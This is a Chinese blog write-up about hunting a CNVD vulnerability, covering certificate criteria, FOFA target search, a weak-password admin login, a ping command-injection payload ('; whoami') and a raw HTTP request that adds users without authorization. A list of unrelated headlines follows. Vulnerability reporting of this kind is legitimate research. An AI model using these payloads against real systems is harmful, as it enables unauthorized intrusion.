2024-06-05-记一次cnvd渗透
创作时间:
作者:
@小白创作中心
2024-06-05-记一次cnvd渗透
引用
CSDN
1.
https://m.blog.csdn.net/m0_73581247/article/details/139465967
前言:挖src挖郁闷了,闲来无事选择挖一个cnvd来练练手,本次的漏洞都没啥难度,企查查资产过了5000万
说一下cnvd证书的下放标准
对于中危及中危以上通用型漏洞(CVSS2.0基准评分超过4.0分),以及涉及党政机关、重要行业单位、科研院所、重要企事业单位(如:中央国有大型企业、部委直属事业单位等)的高危事件型漏洞(后续对事件型漏洞证明颁发标准将参考中央网信办颁布的关键基础设施相关定义和分类),CNVD将给予原创漏洞证明(即CNVD漏洞证书,电子版),该证明可通过编号在CNVD官方网站进行查询跟踪。时限要求:按周对上一周归档漏洞且满足证书颁发条件的进行批量制作。
事件型:高危 重要机构
通用型:中危及以上(评分4.0) 注册资金5000w以上,黑盒的测试案例10或以上(3复现+7其他案例,其他案例不要求复现),白盒的得有源码以及提供漏洞处代码调试过程,包含截图和原因。
过程:
fofa寻找目标
app=“xx目标系统”
admin ,123456 成功登录管理员用户(弱口令yyds)
RCE
发现这里有一个ping 的功能,我想这里应该会存在rce漏洞
ping 127.0.0.1 -c 4 ;whoami (成功rce)
越权
POST xxxxxxxxx HTTP/1.1
Host: xxxxx
Content-Length: 180
Accept: application/json, text/plain,/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: xxxxxxxxxxxxxxxxxxxx
Referer: xxxxxxxxxxxxxxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{“jsonrpc”:“2.0”,“method”:“call”,“params”:[“635F7A20A38A4072899C14B3535CFBF5”,“admin”,“sessionAddUser”,{“username”:“123456”,“password”:“554e36b4db2bc61b606ca16e756b1f7d”}],“id”:11}
这里将admin,换成任意用户即可添加成功
本文原文来自CSDN博客
热门推荐
小米SU7高速碰撞起火事故详情及公司回应
网线中需要知晓的几个常见问题
三晋民居之首--山西常家大院
防范隐私被盗:十大实用安全建议
银行的手机银行安全防护的技术创新与应用?
什么木头最硬最结实最重?中国十大硬木排名
计算机网络:数据链路层 - CSMA/CA协议
厦门首创低值可回收物分拣中心,助力绿色低碳发展
课间加时健康加倍 操场热闹了笑脸更多了
怎么掌握机器学习所需的数学知识?
李建成:被误解的唐朝太子,平庸背后的真相
Science重磅:这种抗癌药成为阿尔茨海默病的新希望,能够挽救记忆和大脑功能
探秘兰花之美:从品种特点到养护技巧全解析
如何自学并且系统学习计算机网络
检测评估需求开始显现 动力电池全生命周期数字化箭在弦上
隧道超前锚杆支护施工工艺,自钻式管棚施工步骤详解
ENFP人格类型全解析:特征、职业与注意事项
现金流量分析(下)——投资和筹资现金流量分析
欧国联A3组最新积分榜:德国不败晋级淘汰赛
左卡尼汀在心脏病治疗中的应用与前景探索
hLife | 抗击超级细菌:吩嗪类化合物的抗菌新策略
5G网络下手机电池为何吃不消?揭秘真相与优化策略
脑膜瘤是什么?症状、诊断与治疗全解析
良性脑膜瘤有症状吗?要治吗?
原电力部直属的七所大学详解:专业设置、师资力量与录取分数线全解析
壁挂式智能马桶清洁与保养指南
Kawaii Bass:一种结合可爱美学与重低音的电子音乐流派
ETF基金与普通基金的比较与选择
当他们跨越山海,到中国寻找生活的另一种可能
重读川端康成《雪国》:生命是一场徒劳的虚无,死亡是最高的艺术